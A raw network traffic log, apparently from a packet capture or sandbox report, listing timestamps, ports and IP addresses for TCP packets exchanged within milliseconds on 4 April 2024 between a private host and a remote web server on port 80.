Apr 4, 2024 17:49:06.475066900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475100994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475104094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475172997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475184917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475208044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475224018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475327969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475398064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475474119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475517035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475557089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475640059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475677967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475738049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475820065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475860119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475898981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475939035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476031065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476067066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476110935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476182938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476274014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476311922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476330042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476428032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476458073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476494074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476531982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476613998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476645947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476646900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476685047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.476768970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476881981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476893902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.476914883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477018118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477058887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477060080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477128983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477142096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477153063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477169037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477170944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477183104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477197886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477221012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477224112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477274895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477300882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477322102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477334023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477355003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477360964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477381945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477453947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477466106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477478027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477489948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477494001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477514982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477526903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477530003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477540016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477571011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477596998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477626085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477663040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477749109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477761030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477771997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477791071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477793932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477823973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477829933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477838039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477870941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477883101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477912903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477931023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.477936983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477952003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477973938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.477982044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478008032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478019953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478039980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478065968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478077888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478096962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478111982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478135109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478140116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478152037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478163004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478187084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478187084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478219032 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478245974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478280067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478319883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478348017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478367090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478379965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478390932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478400946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478415966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478423119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478480101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478496075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478507042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478511095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478527069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478535891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478578091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478611946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478632927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478646994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478658915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478669882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478681087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478705883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478755951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478768110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478779078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478790998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478807926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478833914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478852987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478863955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478887081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478897095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.478899956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478931904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.478940964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479034901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479115009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479125977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479152918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479177952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479178905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479207993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479229927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479249954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479279041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479290962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479302883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479326010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479338884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479350090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479373932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479397058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479408979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479429960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479451895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479459047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479480982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479507923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479515076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479520082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479542971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479552984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479583025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479619980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479624033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479697943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479711056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479723930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479737043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479742050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479772091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479780912 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479794025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479818106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479831934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479834080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479851961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479871035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479897976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479908943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479928970 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479952097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.479959011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479976892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.479988098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480006933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480007887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480021954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480034113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480058908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480082989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480087042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480099916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480130911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480134010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480146885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480179071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480180025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480191946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480215073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480237961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480254889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480288029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480300903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480319023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480391979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480422020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480427980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480456114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480467081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480484962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480496883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480508089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480518103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480541945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480556965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480570078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480609894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480626106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480638027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480653048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480664015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480675936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480690002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480709076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480717897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480730057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480741024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480762959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480762959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480777979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480797052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480808973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480834961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480839968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480863094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480870008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480892897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480926037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.480954885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.480989933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481015921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481024981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481054068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481076002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481087923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481090069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481127024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481132030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481144905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481194973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481206894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481231928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481234074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481251001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481308937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481329918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481342077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481353998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481364012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481367111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481388092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481393099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481405020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481437922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481463909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481498957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481525898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481539965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481571913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481575966 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481604099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481616974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481662989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481702089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481703997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481775999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481813908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481816053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481832981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481869936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481882095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481894970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481910944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481923103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.481940031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.481961012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482019901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482032061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482043982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482059956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482068062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482073069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482089996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482135057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482147932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482158899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482172012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482176065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482188940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482194901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482233047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482251883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482266903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482289076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482296944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482310057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482322931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482342005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482382059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482393980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482405901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482429981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482450008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482455969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482469082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482501984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482520103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482531071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482542992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482554913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482564926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482580900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482593060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482604980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482626915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482645988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482685089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482700109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482731104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482742071 CEST	80	49730	103.23.232.80	192.168.2.10
